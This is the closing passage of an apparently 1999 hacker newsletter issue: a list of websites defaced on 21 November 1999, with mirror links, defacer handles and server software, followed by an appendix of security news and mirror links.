Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.nekipo.ee
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
URL: www.andmevara.ee
Defaced domain: www.andmevara.ee
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.andmevara
Defaced by: verb0
Operating System: Windows NT (IIS/4.0)
URL: bin.mis.bolton.ac.uk
Defaced domain: bin.mis.bolton.ac.uk
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bin.mis.bolton.ac.uk
Defaced by: s-n1nja
Operating System: Apache 1.2.5
URL: www.anzwers.net
Defaced domain: www.anzwers.net
Site Title: Mythos Srl
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.anzwers.net
Defaced by: HiP
Operating System: Linux (Apache 1.3.6)
URL: www.agmkt.state.ny.us
Defaced domain: www.agmkt.state.ny.us
Site Title: State of New York
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.agmkt.state.ny.us
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Mass Hack:
URL: dongabank.co.kr
Defaced domain: dongabank.co.kr
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/dongabank.co.kr
Defaced by: cybernetix
Operating System: Linux (Apache 1.3.9)
Attrition comment: 53 other .kr domains defaced with this one
URL: www.windesheim.nl
Defaced domain: www.windesheim.nl
Site Title: Windenheim
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.windesheim.nl
Defaced by: phr0st
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.sst.nrel.gov
Site Title: National Renewable Energy Laboratory
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.sst.nrel.gov
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.wines.shopwithme.com
Site Title: Shop With Me - Wines
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.wines.shopwithme.com
Defaced by: DHC
Operating System: BSDI 3.0 (Apache 1.2.6)
Defaced domain: www.ipsm.gov.br
Site Title: Instituto de Previd�ncia dos Servidores Militares do Estado de Minas Gerais
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ipsm.gov.br
Defaced by: globher
Operating System: Windows NT (IIS/3.0)
Defaced domain: gw.fresno.gov
Site Title: City of Fresno
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/gw.fresno.gov
Defaced by: globher
Operating System: NT
Defaced domain: www.natall.com
Site Title: National Alliance
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.natall.com
Defaced by: phr0st
Operating System: Windows NT (IIS/3.0)
Defaced domain: www.eseqex.ensino.eb.br
Site Title: Escola de Equita��o do Ex�rcito
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.eseqex.ensino.eb.br
Defaced by: globher
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.ccb.state.or.us
Site Title: State of Oregon
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ccb.state.or.us
Defaced by: ytcracker
Operating System: Windows NT (IIS/4.0)
Defaced domain: da_itc.da.gov.ph
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/da_itc.da.gov.ph
Defaced by: TREATY
Operating System: AIX 4.2 (Apache 1.2.4)
Defaced domain: www.brasemb.or.jp
Site Title: Embassy of Brazil in Tokyo
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.brasemb.or.jp
Defaced by: globher
Operating System: Windows NT
Defaced domain: testwww.sos.state.ga.us
Site Title: Georgia Secretary of State
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/testwww.sos.state.ga.us
Defaced by: secto0r
Operating System: Windows NT
Defaced domain: www.occs.state.or.us
Site Title: Oregon State Board of Education Office of Community College Services
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.occs.state.or.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: mhs.pembrokeshire.ac.uk
Site Title: Pembrokeshire College
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mhs.pembrokeshire.ac.uk
Defaced by: TREATY
Operating System: Solaris
Defaced domain: www.tingiris.com
Site Title: Steve Tingiris
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.tingiris.com
Defaced by: vs
Operating System: Linux
Defaced domain: www.cherokee.k12.ga.us
Site Title: Cherokee County School System
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cherokee.k12.ga.us
Defaced by: secto0r
Operating System: Windows NT
Defaced domain: beta.lamison.com
Site Title: The Lamison Press
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/beta.lamison.com
Defaced by: darkness
Operating System: Linux
Defaced domain: www.coweta.k12.ga.us
Site Title: Coweta County School System
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us
Defaced by: secto0r
Operating System: Windows NT
Defaced domain: www.superstition.com
Site Title: www.superstition.com
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.superstition.com
Defaced by: TREATY
Operating System: NT
Defaced domain: www.ncc.gov.ph
Site Title: Philippine National Computer Center
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.ncc.gov.ph
Defaced by: TREATY
Defaced domain: www.melissa.com
Site Title: Melissa Computer Systems
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.melissa.com
Defaced by: c0de red
Operating System: Solaris
Defaced domain: www.hwa.net
Site Title: Hoefer WYSOCKI Architects
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.hwa.net
Defaced by: p4riah
Operating System: Windows NT
Defaced domain: branson.k12.co.us
Site Title: Branson School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/branson.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: avboces.k12.co.us
Site Title: AV BOCES
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/avboces.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: centennial.k12.co.us
Site Title: Centennial School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/centennial.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: mail.heidmar.net
Site Title: Heidenreich Marine
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mail.heidmar.net
Defaced by: ieet
Operating System: Windows NT
Defaced domain: hoehne.k12.co.us
Site Title: Hoene School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/hoehne.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: fowler.k12.co.us
Site Title: Fowler School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/fowler.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: kim.k12.co.us
Site Title: Kim School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/kim.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: huerfano.k12.co.us
Site Title: Huerfano School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/huerfano.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: bee.d93.k12.id.us
Site Title: District 93
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bee.d93.k12.id.us
Defaced by: TREATY
Operating System: Linux
Defaced domain: lasanimas.k12.co.us
Site Title: Lasanimas School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lasanimas.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: lamar.k12.co.us
Site Title: Lamar School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/lamar.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: manzanola.k12.co.us
Site Title: Manzanola School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/manzanola.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: laveta.k12.co.us
Site Title: Laveta School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/laveta.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: mcclave.k12.co.us
Site Title: McClave School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/mcclave.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: www.dodge.k12.ga.us
Site Title: Dodge School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.dodge.k12.ga.us
Defaced by: secto0r
Operating System: Windows NT
Defaced domain: primero.k12.co.us
Site Title: Primero School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/primero.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: plainview.k12.co.us
Site Title: Plainview School District
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/plainview.k12.co.us
Defaced by: ytcracker
Operating System: Windows NT
Defaced domain: www.essex.ensino.eb.br
Site Title: Essex Escola de Saude do Exercito
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.essex.ensino.eb.br
Defaced by: globher
Operating System: Windows NT
Defaced domain: www.cis.pvt.k12.ca.us
Site Title: Childrens International School
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cis.pvt.k12.ca.us
Defaced by: Nitr0BurN
Operating System: Linux
Defaced domain: www.coweta.k12.ga.us
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.coweta.k12.ga.us
Defaced by: v00d00
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.pm.sc.gov.br
Site Title: Pol�cia Militar de Santa Catarina - PMSC
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.pm.sc.gov.br
Defaced by: globher
Operating System: Apache 1.3.3
Defaced domain: www.srcs.k12.ca.us
Site Title: K12 CA
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.srcs.k12.ca.us
Defaced by: Darkness
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.gibsonconsulting.com (Someone hacked a Gibson!) =)
Site Title: Gibson & Associates, Inc.
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.gibsonconsulting.com
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Defaced domain: saude.sc.gov.br
Site Title: secretaria de saude de santa catarina
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/saude.sc.gov.br
Defaced by: JLM
Operating System: Windows NT (IIS/3.0)
Defaced domain: bcmsc.k12.mi.us
Site Title: K12 MI
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/bcmsc.k12.mi.us
Defaced by: sSh
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.foreigntrade.gov.tr
Site Title: Foreign Trade Turkey
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.foreigntrade.gov.tr
Defaced by: twd
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.mipsor.state.mi.us
Site Title: Michigan Public Sexual Offender Query
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.mipsor.state.mi.us
Defaced by: ieet
Operating System: Windows NT (IIS/4.0)
Defaced domain: www.familychildcare.org
Site Title: Florida Family Child Care
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.familychildcare.org
Defaced by: sSh
Operating System: Linux (Apache 1.3.9)
Attrition comment: Geniuses left off a > tag in TITLE. View source.
Defaced domain: www.cybermoon.net
Site Title: Cybermoon
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.cybermoon.net
Defaced by: zeroc
Operating System: Linux (Apache 1.3.6)
Defaced domain: www.scrf.gov.ru
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/www.scrf.gov.ru
Defaced by: ieet
Operating System: Windows NT (IIS/4.0)
Defaced domain: support.gbcprotech.com
Site Title: GBC Protech
Mirror: http://www.attrition.org/mirror/attrition/1999/11/21/support.gbcprotech.com
Defaced by: sSh
Operating System: Red Hat Linux (Apache 1.3.6)
and more sites at the attrition cracked web sites mirror:
http://www.attrition.org/mirror/attrition/index.html
-------------------------------------------------------------------------
A.0 APPENDICES
_________________________________________________________________________
A.1 PHACVW, sekurity, security, cyberwar links
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The links are no longer maintained in this file, there is now a
links section on the http://welcome.to/HWA.hax0r.news/ url so check
there for current links etc.
The hack FAQ (The #hack/alt.2600 faq)
http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html
Hacker's Jargon File (The quote file)
http://www.lysator.liu.se/hackdict/split2/main_index.html
New Hacker's Jargon File.
http://www.tuxedo.org/~esr/jargon/
HWA.hax0r.news Mirror Sites around the world:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW **
http://net-security.org/hwahaxornews ** NEW **
http://www.sysbreakers.com/hwa ** NEW **
http://www.attrition.org/hosted/hwa/
http://www.attrition.org/~modify/texts/zines/HWA/
http://www.hackunlimited.com/files/secu/papers/hwa/ ** NEW **
http://www.ducktank.net/hwa/issues.html. ** NEW **
http://www.alldas.de/hwaidx1.htm ** NEW **
http://www.csoft.net/~hwa/
http://www.digitalgeeks.com/hwa.*DOWN*
http://members.tripod.com/~hwa_2k
http://welcome.to/HWA.hax0r.news/
http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
� 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]